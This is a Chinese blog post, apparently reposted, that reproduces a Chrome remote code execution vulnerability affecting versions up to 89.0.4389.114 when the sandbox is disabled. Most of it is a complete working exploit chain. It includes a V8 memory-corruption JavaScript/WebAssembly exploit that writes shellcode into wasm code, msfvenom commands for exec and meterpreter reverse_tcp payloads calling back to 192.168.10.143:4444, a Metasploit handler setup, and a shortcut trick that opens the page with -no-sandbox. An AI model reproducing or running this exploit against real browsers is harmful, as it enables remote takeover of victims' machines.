热门标签
热门文章
- 1Ubuntu 18.04系统中执行 sudo apt-get update 报错【总结版】【命令行解决】_aptupdate报错怎么解决
- 2【uniapp小程序实战】—— 使用腾讯地图获取定位_uniapp 腾讯地图
- 3深入浅出PyTorch:从零开始入门人工智能_pytorch从零开始
- 4bugku CTF练习:Flask_FileUpload思路_bugctf flask_fileupload
- 5(Cisco)思科网院所有模块测试题答案整理汇总_计算机网络_思科计算机网络考试汇总
- 6DeepChem教程4:分子指纹
- 7【C语言】数组和指针相关 * 和 & 总结大全_数组&
- 8求字符串中所有整数的最小和_200分_B卷_逻辑分析模拟/数学
- 9袋鼠云高教行业数字化转型方案,推进数字化技术和学校教育教学深度融合_浙江大学 综合校情分析大屏
- 10声音数据集汇总【持续更新】_kaggle声音数据集
当前位置: article > 正文
Chrome远程代码执行_headlesschrome漏洞复现
作者:很楠不爱3 | 2024-04-08 15:46:09
赞
踩
headlesschrome漏洞复现
Chrome远程代码执行复现
漏洞简介
Google Chrome 远程代码执行漏洞。未经身份验证的攻击者利用该漏洞,可通过精心构造恶意页面,诱导受害者访问,实现对浏览器的远程代码执行攻击 , 但攻击者单独利用该漏洞无法实现沙盒(SandBox)逃逸。沙盒是 Google Chrome 浏览器的安全边界,防止恶意攻击代码破坏用户系统或者浏览器其他页面。
Google Chrome 浏览器默认开启沙盒保护模式。
影响范围
Google Chrome < = 89.0.4389.114
使用Chrome内核的其他浏览器。
利用条件
关闭沙箱模式 -no-sandbox
漏洞复现
首先我们生成shellcode
msfvenom -a x64 -p windows/x64/exec CMD="msg.exe administrator hi" EXITFUNC=thread -f num
- 1
使用msg给发送消息
修改poc,在shellcode区域写入自己生成的shellcode
<script> function gc() { for (var i = 0; i < 0x80000; ++i) { var a = new ArrayBuffer(); } } let shellcode = [shellcode 区域]; var wasmCode = new Uint8Array([0, 97, 115, 109, 1, 0, 0, 0, 1, 133, 128, 128, 128, 0, 1, 96, 0, 1, 127, 3, 130, 128, 128, 128, 0, 1, 0, 4, 132, 128, 128, 128, 0, 1, 112, 0, 0, 5, 131, 128, 128, 128, 0, 1, 0, 1, 6, 129, 128, 128, 128, 0, 0, 7, 145, 128, 128, 128, 0, 2, 6, 109, 101, 109, 111, 114, 121, 2, 0, 4, 109, 97, 105, 110, 0, 0, 10, 138, 128, 128, 128, 0, 1, 132, 128, 128, 128, 0, 0, 65, 42, 11]); var wasmModule = new WebAssembly.Module(wasmCode); var wasmInstance = new WebAssembly.Instance(wasmModule); var main = wasmInstance.exports.main; var bf = new ArrayBuffer(8); var bfView = new DataView(bf); function fLow(f) { bfView.setFloat64(0, f, true); return (bfView.getUint32(0, true)); } function fHi(f) { bfView.setFloat64(0, f, true); return (bfView.getUint32(4, true)) } function i2f(low, hi) { bfView.setUint32(0, low, true); bfView.setUint32(4, hi, true); return bfView.getFloat64(0, true); } function f2big(f) { bfView.setFloat64(0, f, true); return bfView.getBigUint64(0, true); } function big2f(b) { bfView.setBigUint64(0, b, true); return bfView.getFloat64(0, true); } class LeakArrayBuffer extends ArrayBuffer { constructor(size) { super(size); this.slot = 0xb33f; } } function foo(a) { let x = -1; if (a) x = 0xFFFFFFFF; var arr = new Array(Math.sign(0 - Math.max(0, x, -1))); arr.shift(); let local_arr = Array(2); local_arr[0] = 5.1;//4014666666666666 let buff = new LeakArrayBuffer(0x1000);//byteLength idx=8 arr[0] = 0x1122; return [arr, local_arr, buff]; } for (var i = 0; i < 0x10000; ++i) foo(false); gc(); gc(); [corrput_arr, rwarr, corrupt_buff] = foo(true); corrput_arr[12] = 0x22444; delete corrput_arr; function setbackingStore(hi, low) { rwarr[4] = i2f(fLow(rwarr[4]), hi); rwarr[5] = i2f(low, fHi(rwarr[5])); } function leakObjLow(o) { corrupt_buff.slot = o; return (fLow(rwarr[9]) - 1); } let corrupt_view = new DataView(corrupt_buff); let corrupt_buffer_ptr_low = leakObjLow(corrupt_buff); let idx0Addr = corrupt_buffer_ptr_low - 0x10; let baseAddr = (corrupt_buffer_ptr_low & 0xffff0000) - ((corrupt_buffer_ptr_low & 0xffff0000) % 0x40000) + 0x40000; let delta = baseAddr + 0x1c - idx0Addr; if ((delta % 8) == 0) { let baseIdx = delta / 8; this.base = fLow(rwarr[baseIdx]); } else { let baseIdx = ((delta - (delta % 8)) / 8); this.base = fHi(rwarr[baseIdx]); } let wasmInsAddr = leakObjLow(wasmInstance); setbackingStore(wasmInsAddr, this.base); let code_entry = corrupt_view.getFloat64(13 * 8, true); setbackingStore(fLow(code_entry), fHi(code_entry)); for (let i = 0; i < shellcode.length; i++) { corrupt_view.setUint8(i, shellcode[i]); } main(); </script>
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
- 45
- 46
- 47
- 48
- 49
- 50
- 51
- 52
- 53
- 54
- 55
- 56
- 57
- 58
- 59
- 60
- 61
- 62
- 63
- 64
- 65
- 66
- 67
- 68
- 69
- 70
- 71
- 72
- 73
- 74
- 75
- 76
- 77
- 78
- 79
- 80
- 81
- 82
- 83
- 84
- 85
- 86
- 87
保存为 shell.html 文件
使用 关闭沙箱启动 chrome
打开 我们的shell.html文件
我们已经成功的执行 msg 命令
我们设置一个快捷方式让它能双击就自启动
我们编辑快捷方式, 在目标位置写入如下
C:\Users\Administrator\AppData\Local\Google\Chrome\Application\chrome.exe -no-sandbox file:///C:/Users/Administrator/Desktop/shell.html
- 1
这样双击打开 shell.html文件的时候 就自动的关闭沙箱启动
直接打开即可弹出消息
接下来我们使用shellcode 上线msf
生成反弹shell的shellcode
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.10.143 lport=4444 -f csharp -o payload.txt
- 1
修改shell.html的shellcode部分
msf开启监听
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.10.143
msf6 exploit(multi/handler) > run
关闭沙箱打开,我们的 shell.html
我们已经成功拿到了主机的一个meterpreter会话
声明:本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:【wpsshop博客】
推荐阅读
相关标签
